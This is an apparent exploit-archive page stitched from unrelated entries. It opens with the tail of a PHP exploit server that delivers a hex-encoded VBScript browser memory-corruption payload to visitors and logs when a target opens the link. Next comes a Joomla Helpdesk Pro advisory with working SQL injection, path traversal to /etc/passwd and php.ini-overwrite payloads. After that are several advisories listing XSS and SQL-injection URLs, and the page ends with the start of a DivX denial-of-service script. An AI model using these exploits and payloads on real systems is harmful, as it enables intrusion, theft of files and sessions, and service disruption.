    "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x43\x72\x65\x61\x74\x65\x28\x29\x0d\x0a\x20\x20\x4f\x6e\x20\x45".
    "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x64\x69\x6d\x20".
    "\x69\x0d\x0a\x20\x20\x43\x72\x65\x61\x74\x65\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x46\x6f\x72".
    "\x20\x69\x20\x3d\x20\x30\x20\x54\x6f\x20\x34\x30\x30\x0d\x0a\x20\x20\x20\x20\x49\x66\x20\x4f\x76".
    "\x65\x72\x28\x29\x3d\x54\x72\x75\x65\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x43".
    "\x72\x65\x61\x74\x65\x3d\x54\x72\x75\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20".
    "\x46\x6f\x72\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x0d\x0a\x20\x20\x4e\x65\x78\x74".
    "\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x73\x75\x62\x20\x74".
    "\x65\x73\x74\x61\x61\x28\x29\x0d\x0a\x65\x6e\x64\x20\x73\x75\x62\x0d\x0a\x20\x0d\x0a\x66\x75\x6e".
    "\x63\x74\x69\x6f\x6e\x20\x6d\x79\x64\x61\x74\x61\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45".
    "\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20\x20\x69".
    "\x3d\x74\x65\x73\x74\x61\x61\x0d\x0a\x20\x20\x20\x20\x20\x69\x3d\x6e\x75\x6c\x6c\x0d\x0a\x20\x20".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32".
    "\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a".
    "\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x69\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x30".
    "\x29\x3d\x36\x2e\x33\x36\x35\x39\x38\x37\x33\x37\x34\x33\x37\x38\x30\x31\x45\x2d\x33\x31\x34\x0d".
    "\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x3d\x6d\x79\x61\x72\x72\x61".
    "\x79\x0d\x0a\x20\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x37\x34\x30\x38\x38\x35\x33\x34".
    "\x37\x33\x31\x33\x32\x34\x45\x2d\x33\x31\x30\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x6d\x79\x64\x61".
    "\x74\x61\x3d\x61\x61\x28\x61\x31\x29\x0d\x0a\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
    "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75".
    "\x6e\x63\x74\x69\x6f\x6e\x20\x0d\x0a\x20\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20".
    "\x73\x65\x74\x6e\x6f\x74\x73\x61\x66\x65\x6d\x6f\x64\x65\x28\x29\x0d\x0a\x20\x20\x20\x20\x4f\x6e".
    "\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20\x20\x20\x20".
    "\x69\x3d\x6d\x79\x64\x61\x74\x61\x28\x29\x20\x20\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28".
    "\x69\x2b\x38\x29\x0d\x0a\x20\x20\x20\x20\x69\x3d\x72\x75\x6d\x28\x69\x2b\x31\x36\x29\x0d\x0a\x20".
    "\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x33\x34\x29\x20\x20\x0d\x0a\x20\x20\x20".
    "\x20\x66\x6f\x72\x20\x6b\x3d\x30\x20\x74\x6f\x20\x26\x68\x36\x30\x20\x73\x74\x65\x70\x20\x34\x0d".
    "\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68\x31\x32\x30\x2b\x6b".
    "\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x6a\x3d\x31\x34\x29\x20\x74\x68\x65\x6e".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64".
    "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x61\x61\x28\x61\x31\x2b\x32\x29\x28".
    "\x69\x2b\x26\x68\x31\x31\x63\x2b\x6b\x29\x3d\x61\x62\x28\x34\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
    "\x61\x61\x28\x61\x30\x29\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x20\x6a\x3d\x30\x20\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x72\x75\x6d\x28\x69\x2b\x26\x68".
    "\x31\x32\x30\x2b\x6b\x29\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x45\x78\x69\x74\x20\x66\x6f\x72\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x0d\x0a\x20\x20".
    "\x20\x20\x6e\x65\x78\x74\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x32\x29\x3d\x31\x2e\x36\x39\x37".
    "\x35\x39\x36\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x0d\x0a\x20\x20\x20\x20\x72\x75".
    "\x6e\x6d\x75\x6d\x61\x61\x28\x29\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d".
    "\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x4f\x76\x65\x72\x28\x29\x0d\x0a\x20\x20\x20".
    "\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65\x78\x74\x0d\x0a\x20".
    "\x20\x20\x20\x64\x69\x6d\x20\x74\x79\x70\x65\x31\x2c\x74\x79\x70\x65\x32\x2c\x74\x79\x70\x65\x33".
    "\x0d\x0a\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x46\x61\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x61\x30".
    "\x3d\x61\x30\x2b\x61\x33\x0d\x0a\x20\x20\x20\x20\x61\x31\x3d\x61\x30\x2b\x32\x0d\x0a\x20\x20\x20".
    "\x20\x61\x32\x3d\x61\x30\x2b\x26\x68\x38\x30\x30\x30\x30\x30\x30\x0d\x0a\x20\x20\x20\x0d\x0a\x20".
    "\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30".
    "\x29\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x20\x61\x62\x28\x61\x30\x29\x20\x20".
    "\x20\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65".
    "\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x32\x29\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x74".
    "\x79\x70\x65\x31\x3d\x31\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x31\x32\x33\x34".
    "\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x30\x31\x32\x33\x34\x35\x36\x37\x38".
    "\x39\x30\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x30\x29\x3d\x31\x30\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28".
    "\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x20\x3d\x20\x46\x61\x6c\x73\x65\x29\x20\x54\x68\x65\x6e\x0d".
    "\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28\x69\x6e\x74\x56\x65\x72\x73\x69\x6f\x6e\x3c\x34\x29".
    "\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x65\x6d\x3d\x63\x69".
    "\x6e\x74\x28\x61\x30\x2b\x31\x29\x2a\x31\x36\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6a\x3d\x76\x61\x72\x74\x79\x70\x65\x28\x61".
    "\x61\x28\x61\x31\x2d\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x28".
    "\x28\x6a\x3d\x6d\x65\x6d\x2b\x34\x29\x20\x6f\x72\x20\x28\x6a\x2a\x38\x3d\x6d\x65\x6d\x2b\x38\x29".
    "\x29\x20\x74\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66".
    "\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20\x20".
    "\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d".
    "\x20\x46\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74".
    "\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28\x61\x31\x29\x29\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65".
    "\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20".
    "\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x20\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x20\x0d\x0a\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x69".
    "\x66\x28\x76\x61\x72\x74\x79\x70\x65\x28\x61\x61\x28\x61\x31\x2d\x31\x29\x29\x3c\x3e\x30\x29\x20".
    "\x20\x54\x68\x65\x6e\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x49\x66\x28\x49\x73\x4f\x62\x6a\x65\x63\x74\x28\x61\x61\x28\x61\x31\x29\x29\x20\x3d\x20\x46".
    "\x61\x6c\x73\x65\x20\x29\x20\x54\x68\x65\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x74\x79\x70\x65\x31\x3d\x56\x61\x72\x54\x79\x70\x65\x28\x61\x61\x28".
    "\x61\x31\x29\x29\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20".
    "\x69\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65".
    "\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x65\x6e\x64\x20\x69\x66\x0d\x0a\x20\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x49".
    "\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x32\x66\x36\x36\x29\x20\x54\x68\x65\x6e\x20\x20\x20\x20".
    "\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72".
    "\x75\x65\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x45\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a".
    "\x20\x20\x20\x20\x49\x66\x28\x74\x79\x70\x65\x31\x3d\x26\x68\x42\x39\x41\x44\x29\x20\x54\x68\x65".
    "\x6e\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4f\x76\x65\x72\x3d\x54\x72\x75\x65\x0d\x0a".
    "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x69\x6e\x39\x78\x3d\x31\x0d\x0a\x20\x20\x20\x20\x45".
    "\x6e\x64\x20\x49\x66\x20\x20\x0d\x0a\x20\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50".
    "\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20".
    "\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x65\x6e\x64\x20\x66\x75\x6e\x63\x74\x69\x6f".
    "\x6e\x0d\x0a\x20\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x72\x75\x6d\x28\x61\x64\x64\x29\x20".
    "\x0d\x0a\x20\x20\x20\x20\x4f\x6e\x20\x45\x72\x72\x6f\x72\x20\x52\x65\x73\x75\x6d\x65\x20\x4e\x65".
    "\x78\x74\x0d\x0a\x20\x20\x20\x20\x72\x65\x64\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20".
    "\x61\x61\x28\x61\x32\x29\x20\x20\x0d\x0a\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29".
    "\x3d\x30\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x61\x28\x61\x31\x29\x3d\x61\x64\x64\x2b\x34\x20".
    "\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x31\x2e\x36\x39\x37\x35\x39\x36".
    "\x36\x33\x33\x31\x36\x37\x34\x37\x45\x2d\x33\x31\x33\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x72\x75\x6d\x3d\x6c\x65\x6e\x62\x28\x61\x61\x28\x61\x31\x29\x29\x20\x20\x0d\x0a\x20\x20".
    "\x20\x20\x0d\x0a\x20\x20\x20\x20\x61\x62\x28\x30\x29\x3d\x30\x0d\x0a\x20\x20\x20\x20\x72\x65\x64".
    "\x69\x6d\x20\x20\x50\x72\x65\x73\x65\x72\x76\x65\x20\x61\x61\x28\x61\x30\x29\x0d\x0a\x65\x6e\x64".
    "\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x0d\x0a\x20\x0d\x0a\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e\x0d".
    "\x0a\x20\x0d\x0a\x3c\x2f\x62\x6f\x64\x79\x3e\x0d\x0a\x3c\x2f\x68\x74\x6d\x6c\x3e";
    $msgd=$msg;
    $msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);
    
    for (;;) {
        if ($client = @socket_accept($reza)) {
            socket_write($client, "HTTP/1.1 200 OK\r\n" .
                         "Content-length: " . strlen($msgd) . "\r\n" .
                         "Content-Type: text/html; charset=UTF-8\r\n\r\n" .
                         $msgd);
            print "\n Target Checked Your Link \n";
        }
        else usleep(100000);
    }
    
    
    ?>
HireHackking 
Document Title
==============
Joomla! plugin Helpdesk Pro < 1.4.0

Reported By
===========
Simon Rawet from Outpost24
Kristian Varnai from Outpost24
Gregor Mynarsky from Outpost24
https://www.outpost24.com/

For full details, see;
https://www.outpost24.com/outpost24-has-found-critical-vulnerabilities-in-joomla-helpdesk-pro/


Tested on
=========
All exploits were tested and verified by Outpost24 for HelpDesk Pro version 1.3.0. While no official testing has been done on earlier versions, all versions prior to 1.4.0, where the issues were finally patched, are suspected of being vulnerable.

Release Date
============
2015-07-16

CVE
===
CVE-2015-4071 CVSS: 4.0 Direct Object References
CVE-2015-4072 CVSS: 6.5 Multiple XSS
CVE-2015-4073 CVSS: 7.8 SQL Injection
CVE-2015-4074 CVSS: 7.8 Local file disclosure/Path traversal
CVE-2015-4075 CVSS: 6.8 File Upload



Vulnerability Disclosure Timeline:
==================================
2015-05-23: Vulnerabilities discovered and reported to mitre
2015-05-25: Vendor contacted
2015-06-21: Vendor released update version: 1.4.0
2015-07-16: Public disclosure


PoC
===

Direct object references CVE-2015-4071.
Authenticated
Path: http://{target}/component/helpdeskpro/?view=ticket&id={ticketId}

It's possible to read other users' support tickets by changing the numeric id.


XSS CVE-2015-4072.
Mostly authenticated dependent on site configuration
Output validation is universally overlooked
Example: Name and message
Path: http://{target}/index.php?option=com_helpdeskpro&view=ticket&layout=form&Itemid=1


SQLi CVE-2015-4073 for both SQLi.

There are 3 SQLi:

Authenticated
Vulnerable parameter: filter_order
Path: http://{url}/index.php?option=com_helpdeskpro&view=tickets
Post data: search=&category_id=0&status_id=-1&limit=10&limitstart=0&option=com_helpdeskpro&task=&boxchecked=0&filter_order=SLEEP('10')&filter_order_Dir=DESC

Unauthenticated
Vulnerable parameter: ticket_code
Path: http://{url}/index.php?option=com_helpdeskpro&view=ticket&ticket_code=1"%20or%20sleep(5)%20%23

Unauthenticated
Vulnerable parameter: email
Path: http://{url}/index.php?option=com_helpdeskpro&task=ticket.save
Post data: name=asdf&email=user@example.com"%20and%20sleep(5)%20and%20"3"="3


Local file disclosure/Path traversal CVE-2015-4074.
Unauthenticated
Path: https://{url}/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe


File Upload CVE-2015-4075.
Unauthenticated
Path: http://{url}/index.php?option=com_helpdeskpro&task=language.save
Injected parameter: item, keys, attacker specified
Post data: lang=&item=./../../../../../../etc/php5/apache2/php&keys[]=[PHP];&[PHP];=val%0aAnyData%0a;
Description: Allows for .ini files to be created wherever the web server has write access. If the .ini file already exists and is writable, it will be overwritten by the server. In a poorly configured system, this will allow for code execution by including applicable arguments in .ini files. This however is not applicable to most systems. Any non-protected .ini files will be possible to replace, with impact depending per file. This PoC will overwrite the file /etc/php5/apache2/php.ini with the content:
;key="val
AnyData
;"
HireHackking 
source: https://www.securityfocus.com/bid/55153/info

Banana Dance is prone to cross-site-scripting and SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues could allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Banana Dance B.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000174)%3C/script%3E&category=3
http://www.example.com/search.php?q=q='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00017B)%3C/script%3E&category=3
http://www.example.com/search.php?q=234&category=-111%27)%20OR%20SLEEP(25)=0%20LIMIT%201--+
HireHackking 
source: https://www.securityfocus.com/bid/55147/info

OrderSys is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

OrderSys 1.6.4 is vulnerable; other versions may also be affected. 

http://example.com/ordering/items.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3
http://example.com/ordering/vendors.php?smenu_1=-1+AND+(SELECT+1+FROM+(SELECT+2)a+WHERE+1%3Dsleep(25))--+1&sterm_1=3&sbool=AND&smenu_2=Name&sterm_2=3&order_1=ASC&order_2=ASC&sort_1=3&sort_2=3&submit_find=Find
http://example.com/ordering/items.php?page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0007B1)%3C/script%3E&where_condition=3&order_condition=name%20ASC
http://example.com/ordering/vendors.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/items.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/orders.php/%22%20stYle=%22x:expre/**/ssion(netsparker(9))
http://example.com/ordering/interface_creator/index_short.php?table_name=item&function=details&where_field='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F1)%3C/script%3E&where_value=279
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F5B)%3C/script%3E&page=0&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/index_short.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000F79)%3C/script%3E&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/login.php?function='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0008F4)%3C/script%3E&go_to=(http%3A%2F%2Fubuntu%2Ftargets%2Fordersys%2Fordering%2Fadmin.php)
http://example.com/ordering/interface_creator/login.php?function=admin&go_to='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000902)%3C/script%3E
http://example.com/ordering/interface_creator/?function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C70)%3C/script%3E&page=0&table_name=vendor
http://example.com/ordering/interface_creator/?function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000C96)%3C/script%3E&table_name=vendor
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B34)%3C/script%3E&page=0&order=Name&order_type=DESC
http://example.com/ordering/interface_creator/index_long.php?table_name=vendor&function=search&where_clause=3&page='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B3F)%3C/script%3E&order=Name&order_type=DESC
HireHackking 
source: https://www.securityfocus.com/bid/55145/info

Jara is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Jara 1.6 is vulnerable; other versions may also be affected. 

SQL Injection Vulnerabilities:

http://example.com/login.php (POST - username)

http://example.com/login.php (POST - password)

http://example.com/admin/delete_page.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_post.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_category.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/delete_user.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_page.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_user.php?id='%2BNSFTW%2B&apos;

http://example.com/admin/edit_post.php (POST - id)

http://example.com/admin/edit_category.php (POST - id)


Cross-site scripting Vulnearbilities:

http://example.com/view.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0031F8)%3C/script%3E

http://example.com/page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003214)%3C/script%3E

http://example.com/category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0032D5)%3C/script%3E

http://example.com/login.php (POST - username)

http://example.com/login.php (POST - password)

http://example.com/admin/delete_page.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E

http://example.com/admin/delete_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003548)%3C/script%3E

http://example.com/admin/delete_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034CE)%3C/script%3E

http://example.com/admin/delete_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E

http://example.com/admin/edit_post.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0034D5)%3C/script%3E

http://example.com/admin/edit_category.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003542)%3C/script%3E

http://example.com/admin/edit_page.php?id='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x003569)%3C/script%3E

http://example.com/admin/edit_user.php?id='%3E%3Cscript%3Enetsparker(9)%3C/script%3E
HireHackking 
source: https://www.securityfocus.com/bid/55125/info

IBM Rational ClearQuest is prone to the following security vulnerabilities:

1. An HTML-injection vulnerability.

2. Multiple information-disclosure vulnerabilities.

3. A security-bypass vulnerability.

Attackers may leverage these issues to obtain potentially sensitive session information, bypass certain security restrictions, execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, or control how the site is rendered to the user; other attacks are also possible.

The following versions are affected:

IBM Rational ClearQuest 7.1.x through versions 7.1.2.7
IBM Rational ClearQuest 8.x through versions 8.0.0.3 

https://www.example.com/snoop
https://www.example.com/hello
https://www.example.com/ivt/
https://www.example.com/hitcount
https://www.example.com/HitCount.jsp
https://www.example.com/HelloHTMLError.jsp
https://www.example.com/HelloHTML.jsp
https://www.example.com/HelloVXMLError.jsp
https://www.example.com/HelloVXML.jsp
https://www.example.com/HelloWMLError.jsp
https://www.example.com/HelloWML.jsp
https://www.example.com/cqweb/j_security_check
HireHackking 
source: https://www.securityfocus.com/bid/55117/info

SaltOS is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

SaltOS 3.1 is vulnerable; other versions may also be affected.

http://www.example.com/SaltOS-3.1/user/lib/phpexcel/PHPExcel/Shared/JAMA/docs/download.php/ â??><script>alert(â??xssâ??)</script>
HireHackking 
source: https://www.securityfocus.com/bid/55105/info

Divx Player is prone to a denial-of-service vulnerability.

An attacker can exploit this issue to cause the application to crash, denying service to legitimate users.

Divx 6.8.2 is vulnerable; other versions may also be affected. 

# usage : perl divxdOs.pl 
my $id="\x55\x46\x49\x44\x20\x55\x6e\x69\x71\x75\x65\x20\x66\x69\x6c\x65\x20\x69\x64\x65\x6e\x74\x69\x66\x69\x65\x72\x0d\x0a\x55\x53\x45\x52\x20\x54\x65\x72\x6d\x73\x20\x6f\x66\x20\x75\x73\x65\x0d\x0a\x55\x53\x4c\x54\x20\x55\x6e\x73\x79\x6e\x63\x68\x72\x6f\x6e\x69\x7a\x65\x64\x20\x6c\x79\x72\x69\x63\x2f\x74\x65\x78\x74\x20\x74\x72\x61\x6e\x73\x63\x72\x69\x70\x74\x69\x6f\x6e";
